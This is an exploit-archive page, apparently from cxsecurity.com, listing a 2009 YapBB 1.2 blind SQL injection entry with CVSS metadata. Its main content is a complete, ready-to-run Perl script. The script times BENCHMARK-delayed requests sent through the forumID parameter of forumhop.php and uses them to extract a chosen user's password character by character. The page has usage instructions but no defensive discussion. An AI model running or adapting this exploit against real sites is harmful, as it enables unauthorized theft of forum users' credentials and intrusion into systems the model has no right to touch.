YapBB <= 1.2 (forumID) Blind SQL Injection Exploit

2009.03.08
Credit: darkjoker
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--+++======================================================+++-- --+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++-- --+++======================================================+++-- #!/usr/bin/perl use strict; use warnings; use IO::Socket; sub usage { die "\nYapBB <= 1.2 Blind SQL Injection Exploit". "\n[?] Author : darkjoker". "\n[?] Site : http://darkjoker.net23.net". "\n[?] CMS Site: http://yapbb.sourceforge.net/". "\n[?] Usage : perl ${0} <hostname> <path> <username> [<key_list>]". "\n[?] Ex. : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz". "\n\n"; } sub query { my ($user, $chr, $pos) = @_; my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ". "forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)"; $query =~ s/ /%20/g; $query =~ s/'/%27/g; return $query; } sub exploit { my ($hostname, $path, $user, $chr, $pos) = @_; $chr = ord ($chr); my $sock = new IO::Socket::INET ( PeerHost => $hostname, PeerPort => 80, Proto => "tcp" ) or die "\n[!] Exploit failed.\n\n"; my $query = query ($user, $chr, $pos); my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1\r\n". "Host: ${hostname}\r\n". "Connection: Close\r\n\r\n"; my $a = time (); print $sock $request; $_++ while (<$sock>); $a = ($a - time ()) * -1; close ($sock); return 1 if ($a > 4); return 0; } my ($hostname, $path, $user, $k_list) = @ARGV; usage unless ($user); my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"); my $chr = 0; my $pos = 1; my $password; while ($chr < scalar (@key)) { if (exploit ($hostname, $path, $user, $key [$chr], $pos)) { $password .= $key [$chr]; $chr = 0; $pos++; } else { $chr++; } } print "\n[+] Password: ${password}\n\n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top